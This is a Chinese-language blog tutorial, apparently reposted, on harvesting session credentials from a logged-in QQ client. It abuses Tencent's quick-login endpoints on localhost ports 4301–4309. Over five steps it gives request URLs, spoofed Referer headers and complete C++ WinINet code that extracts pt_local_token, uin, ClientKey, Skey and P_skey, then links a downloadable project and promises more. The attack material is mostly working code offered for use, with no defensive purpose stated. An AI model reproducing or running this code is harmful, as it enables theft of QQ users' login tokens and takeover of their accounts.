利用腾讯快捷登录协议截取 QQ ClientKey / QQKey 实战课程
生活随笔
收集整理的這篇文章主要介紹了
利用腾讯快捷登录协议截取 QQ ClientKey / QQKey 实战课程
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
本文主要通過利用騰訊網頁快捷登錄協議來模擬訪問并截取已登錄 QQ 客戶端的Token、Uin、ClientKey、Skey、P_skey等。
Step 1、
https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1
初始化地址、建立會話并發送請求,從返回的數據中查找pt_local_token的值。
瀏覽器中的數據(pt_local_token 的值在 Headers -> Response Headers -> Set-Cookie 中)
實現代碼:
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";
char szHostName[128] = { 0 };
char szUrlPath[256] = { 0 };
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// 初始化會話
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet != NULL){
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hHttpSession != NULL){
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (hHttpRequest != NULL){
BOOL bRet = FALSE;
// 發送HTTP請求
bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
if (bRet){
// 查詢HTTP請求狀態
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet){
// 讀取整個Headers
char lpHeaderBuffer[1024] = { 0 };
dwSizeOfRq = 1024;
HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 pt_local_token 的值
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer){
if (strstr(pt_local_token, "pt_local_token=")){
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// 關閉句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;
}
}
}
}
}
Step 2、
https://localhost.ptlogin2.weiyun.com:4301/pt_get_uins?callback=ptui_getuins_CB&r=0.6694805047494219&pt_local_tk=pt_local_token
利用Step1獲取的pt_local_token值構造地址并發送請求獲取已登錄的QQ uin。
請求需要帶入Referer: https://ssl.xui.ptlogin2.weiyun.com/
端口從4301 ~ 4309(如本機只登錄了一個QQ號,那必然會是默認的4301端口)
瀏覽器中的返回數據(在 Response 中)
var var_sso_uin_list=[{"uin":25XXXXXXX3,"face_index":525,"gender":0,"nickname":"XXXXXXX","client_type":65793,"uin_flag":8388608,"account":25XXXXXXX3}];ptui_getuins_CB(var_sso_uin_list);
實現代碼:
/* 二次會話 */
//生成16位隨機數
time_t seed = time(NULL);
srand((unsigned)seed);
CString szRand1 = "", szRand2 = "";
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 5 + 48);
break;
default:
szRand1.Format("%C", rand() % 5 + 53);
}
szRand2 += szRand1;
Sleep(50);
}
char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);
szRand2.ReleaseBuffer();
// 初始化URL參數
char lpszUrlPath[1024] = { 0 };
strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");
strcat(lpszUrlPath, szRandNum); // 追加16位隨機數
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token); // 追加pt_local_token
// 建立會話
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 發送HTTP請求,添加頭信息
char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
if (bRet)
{
// 查詢HTTP請求狀態
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 獲取返回數據的大小
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
if (bRet)
{
// 讀取網頁內容
char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
if (bRet)
{
// 提取 QQ uin
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"uin\":"))
{
uin += sizeof("\"uin\":") - 1;
char* pEndBuffer = strstr(uin, "}");
*pEndBuffer = 0;
break;
}
uin--;
}
// 關閉句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] uin:" << uin << "\r\n" << endl;
delete[] lpBuffer;
}
}
}
}
}
Step 3、
https://localhost.ptlogin2.weiyun.com:4301/pt_get_st?clientuin= uin&pt_local_tk= pt_local_token
截取 QQ ClientKey
利用Step1獲取到的pt_local_token與Step2獲取到QQ uin構造地址并發送請求。
請求需要帶入 Referer: https://ssl.xui.ptlogin2.weiyun.com/
瀏覽器中的數據(在 Cookies -> Response Cookies 中)
實現代碼:
/* 三次會話 */
// 構造 URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// 發送HTTPS請求
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 添加頭信息
char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);
if (bRet)
{
// 查詢HTTP請求狀態
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 讀取整個Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
if (bRet)
{
// 提取 ClientKey 的值
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
// 關閉句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] clientkey:" << clientkey << "\r\n" << endl;
}
}
}
}
}
Step 4、
https://ptlogin2.qq.com/jump?clientuin= uin &clientkey= ClientKey &keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40
獲取 Skey 并提取 ptsigx 的值
利用Step 2的QQ uin與Step 3獲取的ClientKey構造地址并發送請求。
請求需要帶入 Referer:https://ptlogin2.qq.com/
瀏覽器中的數據(Skey 在 Cookies -> Response Cookies 中)
實現代碼:
/* 四次會話 */
// 構造 URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/jump?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&clientkey=");
strcat(lpszUrlPath, clientkey);
strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");
// 發送HTTPS請求
hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 添加Referer
char lpReferer[128] = { 0 };
strcpy(lpReferer, "Referer: ");
strcat(lpReferer, "https://ptlogin2.qq.com/");
strcat(lpReferer, "\r\n");
HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// 查詢HTTP請求狀態
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 獲取返回數據的大小
DWORD dwNumberOfBytesAvailablex = 0;
InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);
// 讀取返回的 Response 數據
char* lpBufferx = new char[dwNumberOfBytesAvailablex + 1]();
InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);
// 輸出 Response 數據
cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;
// 從返回數據中提取 ptsigx 備用
char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;
while (ptsigx != lpBufferx)
{
if (strstr(ptsigx, "check_sig?"))
{
ptsigx += sizeof("check_sig");
char* pEndBuffer = strstr(ptsigx, "'");
*pEndBuffer = 0;
break;
}
ptsigx--;
}
// 構造 ptsigx URL
CString szPtsigx = "";
szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);
cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;
delete[] lpBufferx;
// 讀取整個Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 skey 的值
char* skey = lpHeaderBuffer + dwSizeOfRq;
while (skey != lpHeaderBuffer)
{
if (strstr(skey, "skey="))
{
skey += sizeof("skey");
char* pEndBuffer = strstr(skey, ";");
*pEndBuffer = 0;
break;
}
skey--;
}
// 關閉句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] Skey:" << skey << "\r\n" << endl;
}
}
}
}
Step 5、
獲取 P_skey
通過Step 4構造的 ptsigx URL 建立會話并發送請求。
瀏覽器中的數據(P_skey 在 Headers -> Response Headers -> Set-Cookie 中)
實現代碼:
/* 五次會話 */
char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);
szPtsigx.ReleaseBuffer();
// 發送HTTPS請求
hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// 查詢HTTP請求狀態
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 讀取整個Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 p_skey 的值
char* pskey = lpHeaderBuffer + dwSizeOfRq;
while (pskey != lpHeaderBuffer)
{
if (strstr(pskey, "p_skey="))
{
pskey += sizeof("p_skey");
char* pEndBuffer = strstr(pskey, ";");
*pEndBuffer = 0;
break;
}
pskey--;
}
cout << "[+] P_skey:" << pskey << "\r\n" << endl;
}
}
}
}
至此所有數據已全部獲取完畢,另外還有獲取QQ好友、QQ群數據等等,下回再詳細列舉,如使用過程中有任何BUG或代碼失效可以私信聯系處理(有空的話)。
測試項目下載
【藍奏云下載】(提取碼:eh9v)
【百度云下載】(提取碼:wqau)
總結
以上是生活随笔為你收集整理的利用腾讯快捷登录协议截取 QQ ClientKey / QQKey 实战课程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 首次引入大模型!Bert-vits2-E
- 下一篇: java信息管理系统总结_java实现科